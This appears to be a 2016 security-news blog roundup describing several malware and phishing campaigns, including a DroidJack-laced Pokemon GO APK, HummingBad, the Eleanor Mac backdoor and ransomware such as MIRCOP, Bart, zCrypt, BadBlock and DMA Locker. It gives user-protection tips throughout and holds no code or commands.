Pokemon GO

pokymongo

New mobile game “Pokemon Go” has become the hottest iPhone and Android game to hit the market in forever with enormous popularity and massive social impact. The app has taken the world by storm since its launch this week but also played a role in armed robberies in Missouri, the discovery of a body in Wyoming and minor injuries to fans distracted by the app and to top it all Malware infected apks too..

Nintendo’s new location-based augmented reality game allows players to catch Pokémon in the real life using their device’s camera and is currently only officially available in the United States, New Zealand, UK and Australia. Five days after its release, the game now is on more Android phones than dating app Tinder, snapchat and its rate of daily active users was neck and neck with social network Twitter, according to analytics firm SimilarWeb.

Due to the huge interest surrounding Pokémon Go, many gaming and tutorial websites have offered tutorials recommending users to download the APK from a non-Google Play link. In order to download the APK, users are required to “side-load” the malicious app by modifying their Android core security settings, allowing their device’s OS to install apps from “untrusted sources.”

It is discovered an infected Android version of the newly released mobile game Pokemon GO [1]. This specific APK was modified to include the malicious remote access tool (RAT) called DroidJack (also known as SandroRAT), which would virtually give an attacker full control over a victim’s phone.

A simple method to check if a device is infected would be to check the installed application’s permissions, which can typically be accessed by first going to Settings -> Apps -> Pokemon GO and then scrolling down to the PERMISSIONS section.

To do so, Go to the Settings → Apps → Pokemon GO and check the game’s permissions.
If you find that the game has asked for permissions like directly call phone numbers, edit and read your SMSes, record audio, read Web history, modify and read your contacts, read and write call logs, and change network connectivity, then you should uninstall the game right away, since it is infected with DroidJack.

Bottom line, just because you can get the latest software on your device does not mean that you should. Instead, downloading available applications from legitimate app stores is the best way to avoid compromising your device and the networks it accesses.

HummingBad Android malware: is your device infected?

hummingbad

The same group of cybercriminals behind a strain of iOS malware uncovered last year have apparently diversified and now dabble in Android malware. The group, dubbed Yingmob, has been running a malware campaign named HummingBad that controls 10 million Android devices globally and rakes in $300,000 a month.

Researchers revealed that a Chinese advertising company had created one of the most pernicious pieces of Android malware yet, they estimated it has infected 10m Android handsets worldwide. Be on you guard … HummingBad can do virtually anything the attacker wants, from spying on your personal information to stealing your bank login details.

The main purpose of the HummingBad malware is to trick users into clicking on mobile and web ads, which generates advertising revenue for its parent company, Yingmob – a practice known as “clickfraud”. It’s a lot like the browser toolbars designed to deliver ads to your computer a decade ago.

The malware is rooting hundreds of devices daily Sometimes the malware is unsuccessful at rooting those infected devices, but not always. As far as the ad fraud campaign goes, it really does it all: HummingBad displays ads – more than 20 million per day, creates clicks – more than 2.5 million per day, and installs bogus apps – more than 50,000 per day.

Malware gains “root access” to Android – the very heart of your phone’s operating system – and then calls home to a server controlled by Yingmob, it could be used to do virtually anything the attacker wants it to do, from spying on your personal information to stealing your bank login details. Even if the creators of the malware right now only use it for click fraud, they could decide to sell the rootkit on the internet’s black market.

Most people probably got infected because they installed a less-than-hygienic app from a third-party Android store or website. The vast majority of the 10m infected handsets reside in China and India, indicating third-party app stores – which are far more popular overseas – as the most likely sources. But around 250,000 are based in the US, so could be people who are traveling from Asia to the US, or simply people who ignore Android’s default settings and allow app installs from third-party sites.

You need to install a good Mobile Security for Android such
Max Total Security -Android
  to detect this malware and protect it from
other malware.

Cyber Criminals Using Rio Olympics to Target Users with Phishing Scams

rio2016

The Olympics are right around the corner, and the world will turn its attention to Rio de Janeiro for the Games of the XXXI Olympiad better known as the Summer Olympics in Rio. Unfortunately, the cybercriminals know this and are getting ready for the Olympics as well. Scammers are registering domains that contain these terms: “Rio” and “rio2016.” They are also buying low-cost SSL certificates so as to ensure that their fake websites appear authentic and trusted to the users. Phish websites imitating ticket sale services have turned out to be the most effective of all the scams directed towards innocent users until now.

It’s not only end-users who are targets of phishing attacks. Brazil tops the list as the most attacked country with this type of scam, and employees of the Games organization were also targeted for their potentially lucrative credentials. As happened during the last World Cup, most of the malicious e-mails sent by the Brazilian bad guys used free tickets to watch the Games in Rio as the bait. Some of these messages also pointed to fake websites. This is a good example of a very well done campaign, promising the direct sales of tickets without applications to the official lotteries, that take place for people living in Brazil.

We warn readers to be careful and don’t fall for such scams and expect an increase in such scam emails as the Rio Olympics will be gearing up in August 2016.

New Malware Uses Tor to Open Backdoor on Mac OS X Systems

The malware’s technical name is Backdoor.MAC.Eleanor, and currently, its creators are distributing it to victims as EasyDoc Converter, a Mac app that allows users to convert files by dragging them over a small window.

Backdoor.MAC.Eleanor creates a .onion address for your Mac. The Tor service will automatically connect the infected computer to the Tor network, and generate a .onion domain through which the attacker can access the user’s system using only a browser.

The PHP Web service is the receiving end of that connection, being also tasked with interpreting the commands it receives from the crook’s control panel to the local Mac operating system.

Backdoor provides a lot of remote management options. Additionally, the attackers can also list locally running apps, use the infected computer to send emails, use it as an intermediary point to connect and administer databases, and scan remote firewalls for open ports.

The infected computer basically becomes a bot in the crook’s botnet, which can at any time use it to send out massive spam campaigns, steal sensitive data from the infected system, use it as a DDoS bot, or install other malware.

Below is an image of what the crook sees when accessing your Mac’s Tor .onion link.

elenaor

The application name is EasyDoc Converter.app, and its main functionality should be to
convert documents, but it does anything but that. Instead, it silently installs a backdoor in the system that gives the attacker full access to the operating system, tofile explorer, shell execution, webcam image and video capture and more. The
application is created using Platypus, a tool used for native MAC apps from shell, Perl, Python or Ruby scripts (http://sveinbjorn.org/platypus)

easydoc

MIRCOP Crypto-Ransomware

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document requests users to enable macros to be able to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.

The following screen is showed to the victim, suggesting that the victim has stolen 48.48BTC from a hacktivist group.

mircop-note

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any.

MIRCOP demands users to pay the ransom amount of 48.48 bitcoins (US$ 28,730.70 as of June 23, 2016), which is among the highest demands we have seen. And at the end of the note, the author leaves a bitcoin address. Unlike other ransomware notes where victims are instructed step-by-step on how to make the payment, MIRCOP suggests that the victim is familiar with making bitcoin transactions.

RockLoader Delivers New Bart Encryption Ransomware

A new ransomware by the name Bart is spreading. Victim’s files are encrypted by use of third-party software to compress each file into a password-protected ZIP file, and appends the extension “.bart.zip”. It appears this ransomware is spread by the same vectors as Locky, and appears to mimic it.

The following ransom note is displayed below, and is saved to the desktop as “recovery.txt”.

bart-2

The messages in this campaign had the subjects “Photos” with the attachment “photos.zip”, “image.zip”, “Photos.zip”, “photo.zip”, “Photo.zip”, or “picture.zip.” The zip files contained JavaScript file such as “PDF_123456789.js.

bart-1

Files are encrypted similar to files below:

bart3

The ransom note urges the user to visit a payment portal in order to pay 3 bitcoins (just under $2000 at current exchange rates). The payment portal is similar to the one used by Locky ransomware. By harnessing the skill and judgment of empowered users, an organization can bolster its defenses against malware threats delivered via phishing email.

Overlay Malware spreading via SMS phishing in Europe on Android devices

Overlay malware is a criminal’s Swiss Army Knife. It’s flexible and effective at stealing financial credentials as well as a multitude of other types of sensitive data on an Android device. Overlay malware botnets are expected to proliferate due to to the malware’s proven ability to effectively steal financial credentials alongside other authentication and customer data from mobile devices.

Threat actors typically first setup the command and control (C2) servers and malware hosting sites, then put the malware apps on the hosting sites and send victims SMS messages with an embedded link that leads to the malware app. After landing on the user’s device, the malware launches a process to monitor which app is running in the foreground on the compromised device. When the user launches a benign app into the foreground that the malware is programmed to target (such as a banking app), the malware overlays a phishing view on top of the benign app. The unwary user, assuming that they are using the benign app, will enter the required account credentials, which are then sent to remote C2 servers controlled by threat actors.

Smishing (SMS phishing) offers a unique vector to infect mobile users. The latest Smishing campaigns spreading in Europe show that Smishing is still a popular means for threat actors to distribute their malware. In addition, threat actors have been using diversified host schemes and different C2 servers, and have been continuously refining their malicious code to keep infecting more users and evade detection.

To protect against these threats, users should not install apps from outside official app stores, and take caution before clicking any links where the origin is unclear.

Beware Of Nasty zCrypt

First detected by a security researcher named Jack on May 24, the ransomware infects users computers via malicious spam, malicious macros in Microsoft Office documents, and fake software installers. We are alerting Windows users of a new type of ransomware that exhibits worm-like behavior. This ransom leverages removable and network drives to propagate itself and affect more users. We detect this ransomware as Ransom:Win32/ZCryptor.A,” Microsoft stated in its Threat Research & Response blog. Microsoft notes in its alert that the ransomware currently targets 88 different file types for encryption.

zcrypt-note

When executed, the malware creates a pop-up that appears to be benign – likely to confuse a user while the malware talks to the command and control server and begins the encryption routine. The pop-up will continue to appear while the malware is running. At this time, there is no known way for users affected by ZCryptor to recover their encrypted files for free, unless they have a secure backup of their data to hand. Upon successful installation, the ransomware proceeds to encrypt the unsuspecting user’s files.

Victims must pay the ransom fee, remove the malware and its files from their computers, and then scan their machines for additional malicious code. This ransomware has a secret. Before it even begins the encryption process, the crypto-malware drops “autorun.inf” on all attached removable drives, effectively creating a copy of itself on all USBs connected to the computer at the time of infection.

This propagation technique sets ZCryptor apart from other ransomware variants like Alpha, which is capable of encrypting files on shared folders only. This newest ransomware may even invoke the notion of a “cryptoworm”, first articulated by Cisco security researcher William Largent back in April. ZCryptor might be a harbinger of threats to come.

Fortunately, we can largely defend against it as we would other ransomware variants, such as by avoiding clicking on suspicious links and email attachments, disabling macros by default, downloading software from trusted sources only, maintaining secure backups, and running an up-to-date anti-virus product capable of scanning removable drives on our computers.

BadBlock ransomware

BadBlock is a ransomware-type virus that, after system infiltration, encrypts various files stored in victims’ computers. Unlike other ransomware, BadBlock does not add any extension to encrypted files. After encryption, BadBlock opens a window with a message providing details about the encryption. This ransomware also creates a Help_Decrypt.html file (which contains an identical message), placing it in each folder containing the encrypted files.

Unlike other ransomware like Locky, TeslaCrypt, KimcilWare, PETYA, Mischa and CryptXXX, BadBlock does not append a custom extension to the encrypted file.

It changes the computer’s wallpaper to a red lock screen and grabs the victim’s attention with the caption, “Badblock in on the block!” It claims that the user’s files have been encrypted using RSA algorithm, an asymmetric cryptographic algorithm that uses two different keys (public and private) commonly used to transmit data securely.

After rendering the files inaccessible, BadBlock demands a ransom of two bitcoins (or $900, according to the ransom note). The user is also provided with help links on how to buy bitcoins and how to transfer them to the attacker’s account.

The ransom note further explains that the decryption process will only start upon verification of payment, which it says can take up to two hours. It also warns, “If your anti-virus gets updated and remove BadBlock automatically, even if you pay the ransom, it will not be able to recover your files!”

DMA Locker 4.0 –Ransomware Prepare For A Distribution

In contrast to the previous versions, DMA Locker 4.0 cannot encrypt files offline. It needs to download the public RSA key from its C&C. That’s why, if the file has been opened on the computer without the internet connection, it will just install itself and wait. If the machine is connected – it runs silently until it finish encrypting all the files. It displays message as below and asks for bitcoin payment:dma_gui4

This time DMA Locker comes with a deception layer added – packed sample have an icon pretending a PDF document. After being run, it moves itself to the same location like it’s previous editions – C:\ProgramData under the name svchosd.exe. In addition to the main sample, we can see two additional files: select.bat and cryptinfo.txt.

cryptinfo.txt is a ransom note, analogical to those that we know from the previous editions – only the content changed. Now it is much shorter and contains a link to the individual website for the victim. It also adds registry keys for the persistence in hkey_users. This time the main sample – svchosd.exe – is saved under the name Windows Firewall and the script select.bat – under Windows Update. Public key is not hardcoded this time, but generated per victim* and downloaded.